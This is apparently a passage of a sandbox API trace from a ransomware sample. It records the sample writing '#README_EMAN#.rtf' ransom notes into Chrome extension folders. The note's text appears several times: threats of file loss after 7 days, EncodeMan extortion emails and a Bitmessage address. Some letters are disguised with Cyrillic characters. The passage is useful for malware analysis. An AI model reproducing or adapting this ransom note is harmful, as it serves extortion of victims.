\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.629] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.629] CloseHandle (hObject=0x294) returned 1 [0297.629] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#readme_eman#.rtf")) returned 0x20 [0297.630] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0297.630] GetLastError () returned 0x2 [0297.630] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. 